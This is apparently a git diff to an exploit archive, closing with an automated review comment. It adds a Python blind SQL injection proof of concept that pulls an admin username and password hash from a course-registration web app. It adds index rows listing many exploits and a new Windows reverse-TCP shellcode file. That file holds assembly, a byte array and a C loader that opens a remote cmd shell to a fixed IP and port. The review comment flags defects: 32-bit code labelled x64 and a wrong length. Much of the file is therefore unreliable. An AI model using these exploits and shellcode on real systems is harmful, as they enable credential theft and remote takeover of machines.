{"regno": f"{username}", "password": f"{password}", "submit": ''} + r = session.post(url, headers=headers, data=data) + + + print("Admin username:") + # This range number is pretty arbitrary, so change it to whatever you feel like + for i in range(1,33): + counter = 0 + find = False + for j in user_list: + # This URL may change based on the implementation - change as needed + url = f"{hostname}/online-course-registration/Online/pincode-verification.php" + headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://127.0.0.1", "Connection": "close", "Referer": "http://127.0.0.1/online-course-registration/Online/pincode-verification.php", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1"} + data = {"pincode": f"' or (select(select (substring(username,{i},1)) from admin) = \"{j}\") -- - #", "submit": ''} + a = session.post(url, headers=headers, data=data) + counter += 1 + if 'Course Enroll' in a.text: + sys.stdout.write(j) + sys.stdout.flush() + break + elif counter == len(user_list): + find = True + break + if find: + break + + print("\n") + print("Admin password hash:") + # This range is not arbitrary and will cover md5 hashing - if the hashing implementation is different, change as needed + for i in range(1,33): + counter = 0 + find = False + for j in pass_list: + url = f"{hostname}/online-course-registration/Online/pincode-verification.php" + headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": 
"en-CA,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://127.0.0.1", "Connection": "close", "Referer": "http://127.0.0.1/online-course-registration/Online/pincode-verification.php", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1"} + data = {"pincode": f"' or (select(select (substring(password,{i},1)) from admin) = \"{j}\") -- - #", "submit": ''} + a = session.post(url, headers=headers, data=data) + counter += 1 + if 'Course Enroll' in a.text: + sys.stdout.write(j) + sys.stdout.flush() + break + elif counter == len(pass_list): + find = True + break + if find: + break + + print("\n\nSuccessfully pwnd :)") + +def logo(): + art = R''' +__/\\\\\\\\\\\\\____/\\\\\\\\\\\__/\\\\\_____/\\\__/\\\\_________/\\\__ + _\/\\\/////////\\\_\/////\\\///__\/\\\\\\___\/\\\_\///\\________\/\\\__ + _\/\\\_______\/\\\_____\/\\\_____\/\\\/\\\__\/\\\__/\\/_________\/\\\__ + _\/\\\\\\\\\\\\\/______\/\\\_____\/\\\//\\\_\/\\\_\//___________\/\\\__ + _\/\\\/////////________\/\\\_____\/\\\\//\\\\/\\\__________/\\\\\\\\\__ + _\/\\\_________________\/\\\_____\/\\\_\//\\\/\\\_________/\\\////\\\__ + _\/\\\_________________\/\\\_____\/\\\__\//\\\\\\________\/\\\__\/\\\__ + _\/\\\______________/\\\\\\\\\\\_\/\\\___\//\\\\\________\//\\\\\\\/\\_ + _\///______________\///////////__\///_____\/////__________\///////\//__ + ''' + info = 'CVE-2021-37357 PoC'.center(76) + credits = 'Created by @AffineSecurity and @qhum7sec'.center(76) + print(f"{art}\n{info}\n{credits}") + +def main(): + logo() + hostname = sys.argv[1] + username = sys.argv[2] + password = sys.argv[3] + + if len(sys.argv) != 4: + print("Usage: python3 exploit.py http://127.0.0.1:80 username password") + + exploit(hostname, username, password) + +if __name__ == '__main__': + main() \ No newline at end of file 
diff --git a/files_exploits.csv b/files_exploits.csv
index 1f5bcc305..4c75f74a1 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -44182,6 +44182,7 @@ id,file,description,date,author,type,platform,port
 50123,exploits/php/webapps/50123.py,"Garbage Collection Management System 1.0 - SQL Injection + Arbitrary File Upload",1970-01-01,"Luca Bernardi",webapps,php,
 50128,exploits/php/webapps/50128.py,"osCommerce 2.3.4.1 - Remote Code Execution (2)",1970-01-01,"Bryan Leong",webapps,php,
 50129,exploits/php/webapps/50129.py,"WordPress Plugin Popular Posts 5.3.2 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Simone Cristofaro",webapps,php,
+50132,exploits/hardware/webapps/50132.py,"Seagate BlackArmor NAS sg2000-2000.1331 - Command Injection",1970-01-01,"Metin Yunus Kandemir",webapps,hardware,
 50137,exploits/php/webapps/50137.txt,"WordPress Plugin LearnPress 3.2.6.7 - 'current_items' SQL Injection (Authenticated)",1970-01-01,nhattruong,webapps,php,
 50138,exploits/php/webapps/50138.txt,"WordPress Plugin LearnPress 3.2.6.8 - Privilege Escalation",1970-01-01,nhattruong,webapps,php,
 50139,exploits/php/webapps/50139.txt,"WordPress Plugin Mimetic Books 0.2.13 - 'Default Publisher ID field' Stored Cross-Site Scripting (XSS)",1970-01-01,"Vikas Srivastava",webapps,php,
@@ -44264,9 +44265,11 @@ id,file,description,date,author,type,platform,port
 50256,exploits/php/webapps/50256.txt,"WordPress Plugin Duplicate Page 4.4.1 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Nikhil Kapoor",webapps,php,
 50254,exploits/hardware/webapps/50254.txt,"Compro Technology IP Camera - ' mjpegStreamer.cgi' Screenshot Disclosure",1970-01-01,icekam,webapps,hardware,
 50255,exploits/multiple/webapps/50255.txt,"WPanel 4.3.1 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,Sentinal920,webapps,multiple,
+50259,exploits/php/webapps/50259.txt,"OpenSIS 8.0 'modname' - Directory Traversal",1970-01-01,"Eric Salario",webapps,php,
 50260,exploits/php/webapps/50260.txt,"OpenEMR 6.0.0 - 'noteid' Insecure Direct Object Reference (IDOR)",1970-01-01,"Allen Enosh Upputori",webapps,php,
 50262,exploits/php/webapps/50262.py,"FlatCore CMS 2.0.7 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Mason Soroka-Gill",webapps,php,
 50263,exploits/php/webapps/50263.txt,"Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR)",1970-01-01,sudoninja,webapps,php,
+50264,exploits/php/webapps/50264.py,"Patient Appointment Scheduler System 1.0 - Unauthenticated File Upload",1970-01-01,a-rey,webapps,php,
 50267,exploits/multiple/webapps/50267.txt,"Antminer Monitor 0.5.0 - Authentication Bypass",1970-01-01,Vulnz,webapps,multiple,
 50268,exploits/php/webapps/50268.txt,"WordPress Plugin WP Sitemap Page 1.6.4 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Nikhil Kapoor",webapps,php,
 50269,exploits/php/webapps/50269.py,"WordPress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection (2)",1970-01-01,"Mohin Paramasivam",webapps,php,
@@ -44308,6 +44311,7 @@ id,file,description,date,author,type,platform,port
 50323,exploits/php/webapps/50323.html,"Backdrop CMS 1.20.0 - 'Multiple' Cross-Site Request Forgery (CSRF)",1970-01-01,V1n1v131r4,webapps,php,
 50324,exploits/php/webapps/50324.txt,"WordPress Plugin Advanced Order Export For WooCommerce 3.1.7 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php,
 50325,exploits/php/webapps/50325.html,"WordPress Plugin Fitness Calculators 1.9.5 - Cross-Site Request Forgery (CSRF)",1970-01-01,0xB9,webapps,php,
+50326,exploits/php/webapps/50326.txt,"Budget and Expense Tracker System 1.0 - Arbitrary File Upload",1970-01-01,"()t/\\/\\1",webapps,php,
 50327,exploits/php/webapps/50327.txt,"Police Crime Record Management Project 1.0 - Time Based SQLi",1970-01-01,"()t/\\/\\1",webapps,php,
 50328,exploits/aspx/webapps/50328.txt,"SmarterTools SmarterTrack 7922 - 'Multiple' Information Disclosure",1970-01-01,"Andrei Manole",webapps,aspx,
 50329,exploits/php/webapps/50329.txt,"Pharmacy Point of Sale System 1.0 - SQLi Authentication BYpass",1970-01-01,"Janik Wehrli",webapps,php,
@@ -44315,11 +44319,14 @@ id,file,description,date,author,type,platform,port
 50334,exploits/php/webapps/50334.txt,"Library System 1.0 - 'student_id' SQL injection (Authenticated)",1970-01-01,"Vinay Bhuria",webapps,php,
 50339,exploits/hardware/webapps/50339.txt,"FatPipe Networks WARP 10.2.2 - Authorization Bypass",1970-01-01,LiquidWorm,webapps,hardware,
 50340,exploits/hardware/webapps/50340.txt,"FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Config Download (Unauthenticated)",1970-01-01,LiquidWorm,webapps,hardware,
+50341,exploits/hardware/webapps/50341.txt,"FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Hidden Backdoor Account (Write Access)",1970-01-01,LiquidWorm,webapps,hardware,
+50342,exploits/hardware/webapps/50342.py,"FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Remote Privilege Escalation",1970-01-01,LiquidWorm,webapps,hardware,
 50343,exploits/php/webapps/50343.txt,"WordPress Plugin TranslatePress 2.0.8 - Stored Cross-Site Scripting (XSS) (Authenticated)",1970-01-01,"Nosa Shandy",webapps,php,
 50344,exploits/php/webapps/50344.txt,"WordPress Plugin Contact Form 1.7.14 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php,
 50345,exploits/php/webapps/50345.txt,"WordPress Plugin Ultimate Maps 1.2.4 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php,
 50346,exploits/php/webapps/50346.txt,"WordPress Plugin Popup 1.10.4 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php,
 50348,exploits/php/webapps/50348.py,"Storage Unit Rental Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Ghuliev,webapps,php,
+50350,exploits/php/webapps/50350.txt,"WordPress Plugin Redirect 404 to Parent 1.3.0 - Reflected Cross-Site Scripting",1970-01-01,0xB9,webapps,php,
 50352,exploits/php/webapps/50352.txt,"OpenSIS 8.0 - 'cp_id_miss_attn' Reflected Cross-Site Scripting (XSS)",1970-01-01,"Eric Salario",webapps,php,
 50353,exploits/php/webapps/50353.php,"Pet Shop Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Mr.Gedik,webapps,php,
 50355,exploits/php/webapps/50355.txt,"Cyber Cafe Management System Project (CCMS) 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Sanjay Singh",webapps,php,
@@ -44383,3 +44390,6 @@ id,file,description,date,author,type,platform,port
 50437,exploits/windows/webapps/50437.txt,"Easy Chat Server 3.1 - Directory Traversal and Arbitrary File Read",1970-01-01,z4nd3r,webapps,windows,
 50432,exploits/php/webapps/50432.txt,"Dolibarr ERP-CRM 14.0.2 - Stored Cross-Site Scripting (XSS) / Privilege Escalation",1970-01-01,"Oscar Gil Gutierrez",webapps,php,
 50435,exploits/php/webapps/50435.txt,"Small CRM 3.0 - 'description' Stored Cross-Site Scripting (XSS)",1970-01-01,Ghuliev,webapps,php,
+50438,exploits/java/webapps/50438.txt,"Jetty 9.4.37.v20210219 - Information Disclosure",1970-01-01,"Mayank Deshmukh",webapps,java,
+50439,exploits/php/webapps/50439.py,"Clinic Management System 1.0 - SQL injection to Remote Code Execution",1970-01-01,"Pablo Santiago",webapps,php,
+50440,exploits/php/webapps/50440.txt,"Online Course Registration 1.0 - Blind Boolean-Based SQL Injection (Authenticated)",1970-01-01,"Sam Ferguson",webapps,php,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 3dd8bb7f2..183fffa14 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -1025,3 +1025,4 @@ id,file,description,date,author,type,platform
 48592,shellcodes/linux_x86/48592.c,"Linux/x86 - Disable ASLR Security + Polymorphic Shellcode (124 bytes)",1970-01-01,"Xenofon Vassilakopoulos",shellcode,linux_x86
 48703,shellcodes/linux_x86/48703.c,"Linux/x86 - Egghunter (0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes)",1970-01-01,danf42,shellcode,linux_x86
 48718,shellcodes/windows_x86/48718.c,"Windows/x86 - Download File (http://192.168.43.192:8080/9MKWaRO.hta) Via mshta Shellcode (100 bytes)",1970-01-01,"Siddharth Sharma",shellcode,windows_x86
+50291,shellcodes/windows_x86-64/50291.c,"Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes)",1970-01-01,"Xenofon Vassilakopoulos",shellcode,windows_x86-64
diff --git a/shellcodes/windows_x86-64/50291.c b/shellcodes/windows_x86-64/50291.c
new file mode 100644
index 000000000..16f87a8c9
--- /dev/null
+++ b/shellcodes/windows_x86-64/50291.c
@@ -0,0 +1,290 @@
+# Title: Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes)
+# Date: 09.12.2021
+# Author: Xenofon Vassilakopoulos
+# Tested on: Windows/x64 - 10.0.19043 N/A Build 19043
+
+/*
+
+MIT License
+
+Copyright (c) 2021 Xenofon Vassilakopoulos
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.
+ + +[BITS 32] + +global _start + +section .text + +_start: + +; Locate Kernelbase.dll address +XOR ECX, ECX ;zero out ECX +MOV EAX, FS:[ecx + 0x30] ;EAX = PEB +MOV EAX, [EAX + 0x0c] ;EAX = PEB->Ldr +MOV ESI, [EAX + 0x14] ;ESI = PEB->Ldr.InMemoryOrderModuleList +LODSD ;memory address of the second list entry structure +XCHG EAX, ESI ;EAX = ESI , ESI = EAX +LODSD ;memory address of the third list entry structure +XCHG EAX, ESI ;EAX = ESI , ESI = EAX +LODSD ;memory address of the fourth list entry structure +MOV EBX, [EAX + 0x10] ;EBX = Base address + +; Export Table +MOV EDX, DWORD [EBX + 0x3C] ;EDX = DOS->e_lfanew +ADD EDX, EBX ;EDX = PE Header +MOV EDX, DWORD [EDX + 0x78] ;EDX = Offset export table +ADD EDX, EBX ;EDX = Export table +MOV ESI, DWORD [EDX + 0x20] ;ESI = Offset names table +ADD ESI, EBX ;ESI = Names table +XOR ECX, ECX ;EXC = 0 + +GetFunction : + +INC ECX; increment counter +LODSD ;Get name offset +ADD EAX, EBX ;Get function name +CMP dword [EAX], 0x50746547 ;"PteG" +JNZ SHORT GetFunction ;jump to GetFunction label if not "GetP" +CMP dword [EAX + 0x4], 0x41636F72 ;"rocA" +JNZ SHORT GetFunction ;jump to GetFunction label if not "rocA" +CMP dword [EAX + 0x8], 0x65726464 ;"ddre" +JNZ SHORT GetFunction ;jump to GetFunction label if not "ddre" + +MOV ESI, DWORD [EDX + 0x24] ;ESI = Offset ordinals +ADD ESI, EBX ;ESI = Ordinals table +MOV CX, WORD [ESI + ECX * 2] ;CX = Number of function +DEC ECX ;Decrement the ordinal +MOV ESI, DWORD [EDX + 0x1C] ;ESI = Offset address table +ADD ESI, EBX ;ESI = Address table +MOV EDX, DWORD [ESI + ECX * 4] ;EDX = Pointer(offset) +ADD EDX, EBX ;EDX = GetProcAddress + +; Get the Address of LoadLibraryA function +XOR ECX, ECX ;ECX = 0 +PUSH EBX ;Kernel32 base address +PUSH EDX ;GetProcAddress +PUSH ECX ;0 +PUSH 0x41797261 ;"Ayra" +PUSH 0x7262694C ;"rbiL" +PUSH 0x64616F4C ;"daoL" +PUSH ESP ;"LoadLibrary" +PUSH EBX ;Kernel32 base address +MOV ESI, EBX ;save the kernel32 address in esi for later +CALL EDX 
;GetProcAddress(LoadLibraryA) + +ADD ESP, 0xC ;pop "LoadLibraryA" +POP EDX ;EDX = 0 +PUSH EAX ;EAX = LoadLibraryA +PUSH EDX ;ECX = 0 +MOV DX, 0x6C6C ;"ll" +PUSH EDX +PUSH 0x642E3233 ;"d.23" +PUSH 0x5F327377 ;"_2sw" +PUSH ESP ;"ws2_32.dll" +CALL EAX ;LoadLibrary("ws2_32.dll") + +ADD ESP, 0x10 ;Clean stack +MOV EDX, [ESP + 0x4] ;EDX = GetProcAddress +PUSH 0x61617075 ;"aapu" +SUB word [ESP + 0x2], 0x6161 ;"pu" (remove "aa") +PUSH 0x74726174 ;"trat" +PUSH 0x53415357 ;"SASW" +PUSH ESP ;"WSAStartup" +PUSH EAX ;ws2_32.dll address +MOV EDI, EAX ;save ws2_32.dll to use it later +CALL EDX ;GetProcAddress(WSAStartup) + +; Call WSAStartUp +XOR EBX, EBX ;zero out ebx register +MOV BX, 0x0190 ;EAX = sizeof(struct WSAData) +SUB ESP, EBX ;allocate space for the WSAData structure +PUSH ESP ;push a pointer to WSAData structure +PUSH EBX ;Push EBX as wVersionRequested +CALL EAX ;Call WSAStartUp + +;Find the address of WSASocketA +ADD ESP, 0x10 ;Align the stack +XOR EBX, EBX ;zero out the EBX register +ADD BL, 0x4 ;add 0x4 at the lower register BL +IMUL EBX, 0x64 ;EBX = 0x190 +MOV EDX, [ESP + EBX] ;EDX has the address of GetProcAddress +PUSH 0x61614174 ;"aaAt" +SUB word [ESP + 0x2], 0x6161 ;"At" (remove "aa") +PUSH 0x656b636f ;"ekco" +PUSH 0x53415357 ;"SASW" +PUSH ESP ;"WSASocketA", GetProcAddress 2nd argument +MOV EAX, EDI ;EAX now holds the ws2_32.dll address +PUSH EAX ;push the first argument of GetProcAddress +CALL EDX ;call GetProcAddress +PUSH EDI ;save the ws2_32.dll address to use it later + +;call WSASocketA +XOR ECX, ECX ;zero out ECX register +PUSH EDX ;null value for dwFlags argument +PUSH EDX ;zero value since we dont have an existing socket group +PUSH EDX ;null value for lpProtocolInfo +MOV DL, 0x6 ;IPPROTO_TCP +PUSH EDX ;set the protocol argument +INC ECX ;SOCK_STREAM(TCP) +PUSH ECX ;set the type argument +INC ECX ;AF_INET(IPv4) +PUSH ECX ;set the ddress family specification argument +CALL EAX ;call WSASocketA +XCHG EAX, ECX ;save the socket returned from WSASocketA at 
EAX to ECX in order to use it later + +;Find the address of connect +POP EDI ;load previously saved ws2_32.dll address to ECX +ADD ESP, 0x10 ;Align stack +XOR EBX, EBX ;zero out EBX +ADD BL, 0x4 ;add 0x4 to lower register BL +IMUL EBX, 0x63 ;EBX = 0x18c +MOV EDX, [ESP + EBX] ;EDX has the address of GetProcAddress +PUSH 0x61746365 ;"atce" +SUB word [ESP + 0x3], 0x61 ;"tce" (remove "a") +PUSH 0x6e6e6f63 ;"nnoc" +PUSH ESP ;"connect", second argument of GetProcAddress +PUSH EDI ;ws32_2.dll address, first argument of GetProcAddress +XCHG ECX, EBP +CALL EDX ;call GetProcAddress + +;call connect +PUSH 0x0bc9a8c0 ;sin_addr set to 192.168.201.11 +PUSH word 0x5c11 ;port = 4444 +XOR EBX, EBX ;zero out EBX +add BL, 0x2 ;TCP protocol +PUSH word BX ;push the protocol value on the stack +MOV EDX, ESP ;pointer to sockaddr structure (IP,Port,Protocol) +PUSH byte 16 ;the size of sockaddr - 3rd argument of connect +PUSH EDX ;push the sockaddr - 2nd argument of connect +PUSH EBP ;socket descriptor = 64 - 1st argument of connect +XCHG EBP, EDI +CALL EAX ;execute connect; + +;Find the address of CreateProcessA +ADD ESP, 0x14 ;Clean stack +XOR EBX, EBX ;zero out EBX +ADD BL, 0x4 ;add 0x4 to lower register BL +IMUL EBX, 0x62 ;EBX = 0x194 +MOV EDX, [ESP + EBX] ;EDX has the address of GetProcAddress +PUSH 0x61614173 ;"aaAs" +SUB dword [ESP + 0x2], 0x6161 ;"As" +PUSH 0x7365636f ;"seco" +PUSH 0x72506574 ;"rPet" +PUSH 0x61657243 ;"aerC" +PUSH ESP ;"CreateProcessA" - 2nd argument of GetProcAddress +MOV EBP, ESI ;move the kernel32.dll to EBP +PUSH EBP ;kernel32.dll address - 1st argument of GetProcAddress +CALL EDX ;execute GetProcAddress +PUSH EAX ;address of CreateProcessA +LEA EBP, [EAX] ;EBP now points to the address of CreateProcessA + +;call CreateProcessA +PUSH 0x61646d63 ;"admc" +SUB word [ESP + 0x3], 0x61 ;"dmc" ( remove a) +MOV ECX, ESP ;ecx now points to "cmd" string +XOR EDX, EDX ;zero out EDX +SUB ESP, 16 +MOV EBX, esp ;pointer for ProcessInfo + +;STARTUPINFOA struct +PUSH EDI 
;hStdError => saved socket
+PUSH EDI ;hStdOutput => saved socket
+PUSH EDI ;hStdInput => saved socket
+PUSH EDX ;lpReserved2 => NULL
+PUSH EDX ;cbReserved2 => NULL
+XOR EAX, EAX ;zero out EAX register
+INC EAX ;EAX => 0x00000001
+ROL EAX, 8 ;EAX => 0x00000100
+PUSH EAX ;dwFlags => STARTF_USESTDHANDLES 0x00000100
+PUSH EDX ;dwFillAttribute => NULL
+PUSH EDX ;dwYCountChars => NULL
+PUSH EDX ;dwXCountChars => NULL
+PUSH EDX ;dwYSize => NULL
+PUSH EDX ;dwXSize => NULL
+PUSH EDX ;dwY => NULL
+PUSH EDX ;dwX => NULL
+PUSH EDX ;pTitle => NULL
+PUSH EDX ;pDesktop => NULL
+PUSH EDX ;pReserved => NULL
+XOR EAX, EAX ;zero out EAX
+ADD AL, 44 ;cb => 0x44 (size of struct)
+PUSH EAX ;eax points to STARTUPINFOA
+
+;ProcessInfo struct
+MOV EAX, ESP ;pStartupInfo
+PUSH EBX ;pProcessInfo
+PUSH EAX ;pStartupInfo
+PUSH EDX ;CurrentDirectory => NULL
+PUSH EDX ;pEnvironment => NULL
+PUSH EDX ;CreationFlags => 0
+XOR EAX, EAX ;zero out EAX register
+INC EAX ;EAX => 0x00000001
+PUSH EAX ;InheritHandles => TRUE => 1
+PUSH EDX ;pThreadAttributes => NULL
+PUSH EDX ;pProcessAttributes => NULL
+PUSH ECX ;pCommandLine => pointer to "cmd"
+PUSH EDX ;ApplicationName => NULL
+CALL EBP ;execute CreateProcessA
+
+*/
+
+#include
+#include
+#include
+
+char code[] =
+"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x96\xad\x8b"
+"\x58\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31"
+"\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f"
+"\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x01\xde"
+"\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x31\xc9\x53"
+"\x52\x51\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54"
+"\x53\x89\xde\xff\xd2\x83\xc4\x0c\x5a\x50\x52\x66\xba\x6c\x6c\x52\x68\x33"
+"\x32\x2e\x64\x68\x77\x73\x32\x5f\x54\xff\xd0\x83\xc4\x10\x8b\x54\x24\x04"
+"\x68\x75\x70\x61\x61\x66\x81\x6c\x24\x02\x61\x61\x68\x74\x61\x72\x74\x68"
+"\x57\x53\x41\x53\x54\x50\x89\xc7\xff\xd2\x31\xdb\x66\xbb\x90\x01\x29\xdc"
+"\x54\x53\xff\xd0\x83\xc4\x10\x31\xdb\x80\xc3\x04\x6b\xdb\x64\x8b\x14\x1c"
+"\x68\x74\x41\x61\x61\x66\x81\x6c\x24\x02\x61\x61\x68\x6f\x63\x6b\x65\x68"
+"\x57\x53\x41\x53\x54\x89\xf8\x50\xff\xd2\x57\x31\xc9\x52\x52\x52\xb2\x06"
+"\x52\x41\x51\x41\x51\xff\xd0\x91\x5f\x83\xc4\x10\x31\xdb\x80\xc3\x04\x6b"
+"\xdb\x63\x8b\x14\x1c\x68\x65\x63\x74\x61\x66\x83\x6c\x24\x03\x61\x68\x63"
+"\x6f\x6e\x6e\x54\x57\x87\xcd\xff\xd2\x68\xc0\xa8\xc9\x0b\x66\x68\x11\x5c"
+"\x31\xdb\x80\xc3\x02\x66\x53\x89\xe2\x6a\x10\x52\x55\x87\xef\xff\xd0\x83"
+"\xc4\x14\x31\xdb\x80\xc3\x04\x6b\xdb\x62\x8b\x14\x1c\x68\x73\x41\x61\x61"
+"\x81\x6c\x24\x02\x61\x61\x00\x00\x68\x6f\x63\x65\x73\x68\x74\x65\x50\x72"
+"\x68\x43\x72\x65\x61\x54\x89\xf5\x55\xff\xd2\x50\x8d\x28\x68\x63\x6d\x64"
+"\x61\x66\x83\x6c\x24\x03\x61\x89\xe1\x31\xd2\x83\xec\x10\x89\xe3\x57\x57"
+"\x57\x52\x52\x31\xc0\x40\xc1\xc0\x08\x50\x52\x52\x52\x52\x52\x52\x52\x52"
+"\x52\x52\x31\xc0\x04\x2c\x50\x89\xe0\x53\x50\x52\x52\x52\x31\xc0\x40\x50"
+"\x52\x52\x51\x52\xff\xd5";
+
+int main(int argc, char** argv)
+{
+ //HWND hWnd = GetConsoleWindow();
+ //ShowWindow(hWnd, SW_HIDE);
+ printf("Shellcode Length: %d\n", strlen(code));
+ void* exec = VirtualAlloc(0, strlen(code), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+ memcpy(exec, code, sizeof(code));
+ ((void(*)())exec)();
+
+ return 0;
+}
\ No newline at end of file
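Review bot: The new file is titled, filed (`shellcodes/windows_x86-64/`, CSV platform `windows_x86-64`) and described as Windows/x64, but the embedded listing is `[BITS 32]`, locates the PEB through `FS:[ecx + 0x30]`, and uses 32-bit registers with a push-based calling sequence, so this is 32-bit code that an x64 host would run only as a WOW64 process; the title, CSV row and directory should say x86, or the header should state the WOW64 requirement. The harness in `main` also sizes the buffer with `strlen(code)` although the byte array contains `\x00\x00` (the `"\x81\x6c\x24\x02\x61\x61\x00\x00..."` line), so the printed length and the `VirtualAlloc` request stop at that point while `memcpy` copies `sizeof(code)` bytes — by my count `strlen` yields exactly the advertised 330 while the array holds 420 bytes plus the terminator, so the "330 Bytes" in the title and CSV row is the truncated value and should be corrected along with the harness. Use one length consistently and check the allocation: `size_t len = sizeof(code) - 1;` / `void* exec = VirtualAlloc(0, len, MEM_COMMIT, PAGE_EXECUTE_READWRITE); if (!exec) return 1;` / `memcpy(exec, code, len);`, printing it with `%zu` rather than `%d`. The three `#include` lines in the hunk carry no header name, presumably a rendering artifact of the angle brackets, which should be confirmed against the raw file before the listing is relied on to compile.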